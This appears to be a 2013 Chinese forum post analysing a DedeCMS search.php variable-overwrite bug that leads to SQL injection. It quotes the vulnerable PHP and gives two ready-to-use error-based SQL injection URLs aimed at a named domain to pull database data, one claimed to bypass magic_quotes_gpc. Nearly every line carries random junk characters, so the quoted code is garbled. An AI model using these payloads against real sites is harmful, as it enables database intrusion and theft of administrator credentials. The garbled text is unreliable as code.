微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.1 s' r1 h0 y( n* @2 |1 H0 Q
作者: [email protected]" \, R. C& F/ d$ M
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.7 f, {9 w' B% ~! H: ~4 d, Z. T
7 O+ y, R( |( g; Z5 }
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
# T9 g$ C+ D) ~& k
) t4 J+ ]) u A: a============
" k! M, D$ U f2 _ q. Y6 G5 ^. f % ?- P- h* m/ D% E
* C/ A; h# N- w( B2 |Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
: C% _1 `& ~& b+ i0 N a$ v
/ @$ C K( Q0 r# C. q: X0 P/ qrequire_once(dirname(__FILE__).”/../include/common.inc.php”);
6 ~; l, A# O+ N- d3 K# U% B4 Orequire_once(DEDEINC.”/arc.searchview.class.php”);
# M8 k& C- @" t* X- N& p , V/ c$ W' Z/ {& ~* e0 G! I
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;4 m' t8 R& L0 b s) Q) _3 o3 B
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
2 M$ ?- h1 Y7 R$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
2 q1 w' N. \' m9 V) ]5 x' W$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
4 q( w# ?7 F: e; G4 @8 o$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
- I; A6 m# A P& Q2 N) w # k! [+ C8 A0 I! c
if(!isset($orderby)) $orderby=”;+ G2 F$ t! J2 P8 a# v. H1 p' v3 Y
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);9 _9 Q% l& `' @
1 K6 ^- f7 Y! A9 o/ R4 D 6 A; j+ d3 R, M0 ^& i6 d
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;) h) M: l( `' c1 W& w; o
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);* N" V8 f2 i" X7 I8 J/ ], ^
' e, @: @" N. g$ K5 H; a
if(!isset($keyword)){: `3 N. q, I; o% t( Y* p6 i; O2 p
if(!isset($q)) $q = ”;
; v+ h% q. i: e $keyword=$q;
1 l+ R% |2 d b) A; @6 v- K}
0 d5 p' l: A9 p" ^5 D$ G
% `1 W9 _7 q; S3 V$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
0 y) f) F9 z8 |* t# ~/ y$ e1 h
; ?& d0 }3 v" s6 K" Z, F, e//查找栏目信息5 i, I3 K7 }9 W' e: f0 ?, E
if(empty($typeid))
, k: @% q: y1 W& V! S1 C{
3 Y2 v% _7 V% D7 ~2 U: F/ Z9 E( { $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;( S* Y; Y- p7 S6 [; n% D
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ) F. m# X: _, y1 c R4 y# g
{( r, S4 K/ V4 o# ?
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
1 T) w; W7 y; }0 v! V fwrite($fp, “<”.”?php\r\n”);
. r( u3 A% Q2 L' V; C $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
# t% `+ ~" g' T6 M7 W $dsql->Execute();0 b2 Z' F+ d' [. V( v( w
while($row = $dsql->GetArray())
. s2 l0 V/ o; w% D$ P* n4 N {( U: m5 F+ A4 D' d& y+ W
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);% M& w2 t- k7 n: n' ]: E' S
}
; \1 m4 q3 Z' S$ i fwrite($fp, ‘?’.'>’);
' J& G# k: B$ \0 t fclose($fp);0 h4 h: h) l, ?4 ?2 a" |; x( i
}3 u: [% a4 k6 d6 n
//引入栏目缓存并看关键字是否有相关栏目内容1 Y* a# k0 G2 \4 U) @+ i
require_once($typenameCacheFile);
- H& K, J# [9 R5 x. i- [//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个! K1 k0 L1 m- _# e, H
//5 j i+ A. q+ G2 c
if(isset($typeArr) && is_array($typeArr)), r/ I; v0 p9 W4 A& G
{: j) u: a% r$ _* V$ Z2 }
foreach($typeArr as $id=>$typename)
( m8 C2 Y5 G9 o9 B) _& A {
+ H- S. \- h& q+ p3 ?
, h) F! r& F5 V; r! Q <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
0 ~# C( ?- ?! C/ p; | if($keyword != $keywordn)& u) S& d2 C# ?( z! }3 r9 t
{ f* J5 A% r& o9 v8 a
$keyword = $keywordn;' G5 }. k+ x3 |9 |! H* |: c
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
4 p+ x; d( x( `7 {! r* H# j$ t break;; [/ P" E% B- P( x, ?
}3 e F( Z$ x& _# k4 k; o& O( B
}
0 O/ t/ O2 ]: s6 J8 C }
- z' c( O6 U' n3 {+ J! O8 o}' L8 S) p1 \: G4 X
然后plus/search.php文件下面定义了一个 Search类的对象 .6 ~& a- I# L2 t9 o6 O2 S
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.% {4 W7 o1 @# V, \
$this->TypeLink = new TypeLink($typeid);
v) s8 {1 Z7 u& W7 M
* I0 T: q1 T* C1 G) uTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.- |* S' ^" T8 A+ G( E) ^
; b3 v# ^" e0 [( D; v; b/ jclass TypeLink& s+ ~& O2 l' g# k6 e! ?2 k3 i
{
9 [' Q) h, q' K var $typeDir;! d$ G% |6 n. P" Z* r' c, Q0 Y
var $dsql;
p6 I, X! g9 H0 O, Z' B4 I' s8 V var $TypeID;
6 A& j5 K; t/ f var $baseDir;
5 r6 P o! b( D( `+ C var $modDir;1 ?" b$ Z2 t) ~& Q+ q$ k
var $indexUrl;7 r- ^& _1 P" j" [8 ]* o
var $indexName;
) c' N1 l0 L3 m6 Q: k/ p$ E( } var $TypeInfos;
3 e1 e* p0 P# ]- T var $SplitSymbol;
# W0 @' {, _+ v8 ~( T var $valuePosition;
7 m% X! {, B7 A' f2 t var $valuePositionName;, r5 f! k1 L- j# ~
var $OptionArrayList;//构造函数///////
c) v1 J2 R2 T' j8 S& P7 I //php5构造函数
; Z+ G& x+ p8 A- w& Z4 u function __construct($typeid)
5 u, v- v5 n( x2 g0 G4 y8 m {2 ]6 b5 o ?5 Q% d, l( @
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];3 V% T( R5 c5 w$ e; P- [) D
$this->indexName = $GLOBALS['cfg_indexname'];
! i& G J, Q) R1 u" { $this->baseDir = $GLOBALS['cfg_basedir'];
, g8 k% z8 Z5 ]( j7 B9 i $this->modDir = $GLOBALS['cfg_templets_dir'];
9 a! I% |; O$ P $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
" u) X7 }' x9 N( l $this->dsql = $GLOBALS['dsql'];
! J* ^4 M; C: d2 w4 ]1 }7 _ $this->TypeID = $typeid;
, [3 c- O% Q- G9 K3 Y: {* ^ $this->valuePosition = ”;9 R* X' V! W5 \4 T" J& Z# k
$this->valuePositionName = ”;
8 }$ F) d8 |+ n7 j& q0 l6 z a8 ~# D) C7 i" j $this->typeDir = ”;
" B. C- i5 X# ?- E. a1 U/ @3 X" g $this->OptionArrayList = ”;
+ {. h! ^8 L+ S9 C7 k # [8 g9 Z, Z) Y7 ^8 V c P
//载入类目信息3 ~4 S- b( _. a6 H
- Z, m6 L: h- L' r: p1 T5 M
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
8 `1 R3 f! Y7 `( ?) |4 s; `7 hctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
a9 _* d- d# ?% h`#@__channeltype` ch( Z a# h1 \+ r. g$ R
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
% B' ]% B3 E9 {4 u, G
( Y* P! O, H! ?5 A" I/ H if($typeid > 0)
6 R5 l! P% u, @5 Y {
0 h6 ?7 K( E7 ` $this->TypeInfos = $this->dsql->GetOne($query);7 a3 k/ t5 O& o/ f2 E
利用代码一 需要 即使magic_quotes_gpc = Off) x z$ F7 g/ w9 P" J: r8 n6 i
: R) T3 M: W. `) F
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title, H- Y: d, v) Q# ~
- W% w2 Y6 w9 z+ ~8 {
这只是其中一个利用代码… Search 类的构造函数再往下6 A$ |) E. |5 B: @/ w1 A2 y
* t& q3 r" w8 F2 F
……省略# G2 T) O9 |' g; S( j
$this->TypeID = $typeid;! E% M8 ?( \" H7 d6 h2 U0 Y0 y
……省略
* ?; D k( K* Y/ y% @7 o% zif($this->TypeID==”0″){
4 F$ ^+ e3 W2 z9 V& K $this->ChannelTypeid=1;
- N) s7 n( w, d9 I6 D. u }else{
3 a8 T: \1 J) }4 _ $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
) R. q J4 }8 H' {//现在不鸡肋了吧亲…; N/ c# T, h! Y/ v/ m$ C
$this->ChannelTypeid=$row['channeltype'];7 \% f! [) \7 N" j
5 _" Q' q. S4 N% r$ ?; m }
1 k; v" c& w9 V! c& d( r) U' w利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.6 c( s; g5 C E) a
: S2 [( ~3 Z- E0 `/ rwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
5 w5 K3 Z& Z0 ]4 q% g: |+ K) { : X1 b- J; U& g7 U
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站# \( ^: e2 v- `) l
|
发表于 2013-1-19 08:18:56
收藏
分享
支持
反对